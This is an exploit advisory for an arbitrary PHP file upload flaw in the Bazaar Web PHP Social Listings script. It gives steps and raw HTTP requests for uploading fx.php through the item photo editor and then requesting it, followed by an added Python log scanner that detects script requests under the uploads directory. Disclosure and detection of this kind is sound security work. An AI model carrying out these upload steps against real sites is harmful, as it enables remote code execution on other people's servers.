Bazaar Web PHP Social Listings suffers from a remote shell upload vulnerability.
<--
# Exploit Title: Bazaar Web PHP Social Listings Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - [email protected]
# Software Link: https://codecanyon.net/item/bazaar-social-listing-shopping-web-php-template/23207913
# Software Demo :https://xserver.app/__apps/bazaar-web/index.php#
# Category: webapps
1. Description
The Bazaar Web PHP Social Listings script contains an arbitrary file upload
vulnerability: a registered user can upload .php files in the "Edit an item"
section without any security checks.
List item link:
localhost/bazaar-web/list-item-info.php
Edit the item photos and upload a PHP file, then use inspect element to find
the path of the uploaded file.
Uploaded file path:
localhost/bazaar/uploads/yourfile.php
Right-click the photo and use inspect element to get the path.
Host: (HOST)
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------47450779111254302601850437199
Content-Length: 63132
Connection: keep-alive
Referer: https:/localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; AWSALBCORS=BOOAELkwd/6yNqpv36ou/NXmOgXJcpsfK+qMH36RZwhotfk/zd8hoyDpbc2Qt4nwl1mw8CBJm0bJTwoci7kY6kAfwutcXuxjFCKoSPXqis2mMnE1ab8qwGquZOYI; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
file=fx.php&fileName=fx.php
GET
https://localhost/bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php
Host: HOST
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: image/avif,image/webp,*/*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://localhost/bazaar-web/list-item-info.php?itemID=uT8aeJcTu5
Cookie: AWSALB=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; AWSALBCORS=Zl/BPrqEgbVqCknGhgr3fTBKhe+vxhq2WkKOn6NZEvstF659/bY85gK5a9rehQC9ejX8mXIhp/F5HoMd7iiNXUs0PKBGysX6kGrjeS2ZnnmHHfe6wwZNqWYQbbRx; PHPSESSID=o0it0cquadspsgh864fr4mvtrt
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
#####
-->
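Added example, not part of the original advisory: a detection check for the behaviour shown above, where a file stored under `uploads/` is later requested as a script. It scans web server access logs in combined format; the extension list, the `UPLOAD_DIRS` setting, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Extensions commonly mapped to a PHP handler (assumption: match this to your server config).
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
# Upload directory named in the advisory; add any other directory the application writes to.
UPLOAD_DIRS = ("/uploads/",)
# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def script_in_upload_path(target):
    """Return the offending path segment if the target names a script under an upload dir."""
    path = unquote(urlsplit(target).path).lower()
    for d in UPLOAD_DIRS:
        idx = path.find(d)
        if idx == -1:
            continue
        # Check every segment below the upload dir so "x.php/extra" (path info) is caught.
        for segment in path[idx + len(d):].split("/"):
            # Check every dot-separated part so "x.php.jpg" (double extension) is caught.
            parts = segment.rstrip(". ").split(".")[1:]
            if any(p in SCRIPT_EXTS for p in parts):
                return segment
    return None

def find_script_requests(lines):
    """Return (ip, method, segment, status, severity) for each suspicious log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        segment = script_in_upload_path(m["target"]) if m else None
        if segment:
            # A 2xx status means the file exists and the server handled it: investigate first.
            severity = "high" if m["status"].startswith("2") else "review"
            findings.append((m["ip"], m["method"], segment, int(m["status"]), severity))
    return findings

# Constructed sample log lines (not taken from the advisory or any real server).
SAMPLE = [
    '203.0.113.7 - - [19/Dec/2021:10:01:02 +0000] "GET /bazaar/uploads/pZ2CGSkezbiDprchqpZ7_fx.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Dec/2021:10:01:09 +0000] "GET /bazaar/uploads/a1b2_photo.jpg HTTP/1.1" 200 48211 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [19/Dec/2021:10:02:40 +0000] "GET /bazaar/uploads/x9_img.PHP.jpg HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [19/Dec/2021:10:03:11 +0000] "GET /bazaar-web/list-item-info.php?itemID=abc HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_script_requests(SAMPLE):
        print(finding)
```

Any finding is also a sign that the upload directory still allows script execution; a photo upload directory should never serve a response generated by the PHP handler.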